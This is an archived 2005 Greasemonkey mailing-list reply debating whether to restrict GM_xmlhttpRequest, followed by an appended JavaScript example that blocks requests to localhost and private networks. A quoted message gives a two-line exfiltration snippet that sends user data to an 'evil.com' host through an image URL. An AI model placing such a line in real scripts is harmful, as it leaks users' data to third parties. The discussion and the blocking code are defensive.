[Greasemonkey] GM_xmlhttpRequest and localhost

Jason Diamond jason at injektilo.org
Tue Jul 19 16:33:54 EDT 2005


Aaron Boodman wrote:

>  I would like this too, and I really think that this is the feature.
>  However, locking down GM_xmlhttpRequest is meaningless. If somebody
>  wants to steal your data with a user script, all they have to do is:
>
>  var img = new Image();
>  img.src = "http://evil.com?yourdata=....";
>
>  There are numerous features like this in today's browsers and it isn't
>  practical to block them all. Even if you could, a user script could
>  simply change the href of every anchor attribute to his evil domain.
>  By the time you figured out what happened, he'd already have you.

Ah, good point.

>  Preventing the *reading* of internal data is a better argument for
>  pattern restrictions on GM_xmlhttpRequest since this is not
>  implementable in JavaScript except through xmlhttprequest.

It never occurred to me that I could read local data with a user script 
until I saw Mark's exploit. Now that I know it's possible, I'd hate to 
see that capability disappear (assuming, of course, the security 
problems can be "solved").

-- 
Jason
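
Added example, not part of the original thread and not Greasemonkey's own code: one way a pattern restriction on a GM_xmlhttpRequest-style call could refuse localhost and private-network URLs before consulting a script's allowed patterns. The names `checkRequest` and `isInternalHost`, and the `*`-only glob syntax, are assumptions.

```javascript
// Added illustration; checkRequest/isInternalHost are hypothetical names,
// not Greasemonkey APIs. Patterns use "*" as the only wildcard.
function globToRegExp(glob) {
  const escaped = glob.replace(/[.+?^${}()|[\]\\]/g, "\\$&").replace(/\*/g, ".*");
  return new RegExp("^" + escaped + "$", "i");
}

// True for loopback, unspecified, RFC 1918 and link-local literals.
// String checks only: a public DNS name that resolves to an internal
// address is not caught here and needs a check at connect time.
function isInternalHost(hostname) {
  const host = hostname.toLowerCase().replace(/\.$/, "");
  if (host === "localhost" || host.endsWith(".localhost")) return true;
  if (host.startsWith("[")) {
    const v6 = host.slice(1, -1);
    // Loopback, unspecified, unique-local, link-local; IPv4-mapped is refused outright.
    return v6 === "::1" || v6 === "::" || /^f[cd]/.test(v6) ||
      /^fe[89ab]/.test(v6) || v6.startsWith("::ffff:");
  }
  const m = host.match(/^(\d+)\.(\d+)\.(\d+)\.(\d+)$/);
  if (!m) return false;
  const a = Number(m[1]), b = Number(m[2]);
  return a === 0 || a === 10 || a === 127 || (a === 169 && b === 254) ||
    (a === 172 && b >= 16 && b <= 31) || (a === 192 && b === 168);
}

function checkRequest(rawUrl, allowedPatterns) {
  let url;
  try { url = new URL(rawUrl); } catch { return { allowed: false, reason: "unparseable URL" }; }
  if (url.protocol !== "http:" && url.protocol !== "https:")
    return { allowed: false, reason: "scheme " + url.protocol };
  // new URL() has already normalized numeric hosts such as 2130706433 to 127.0.0.1.
  if (isInternalHost(url.hostname))
    return { allowed: false, reason: "internal host " + url.hostname };
  const ok = allowedPatterns.some((p) => globToRegExp(p).test(url.href));
  return { allowed: ok, reason: ok ? "matched pattern" : "no pattern matched" };
}

// Constructed sample requests from a script allowed to reach one API only.
const samplePatterns = ["https://api.example.com/*"];
for (const u of ["https://api.example.com/feed", "http://localhost:8080/", "http://2130706433/",
                 "http://192.168.1.1/status", "file:///home/user/notes.txt", "https://other.example.org/"]) {
  console.log(u, JSON.stringify(checkRequest(u, samplePatterns)));
}
```

The internal-host check runs before pattern matching, so a script granted `*` still cannot read from loopback or private ranges.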


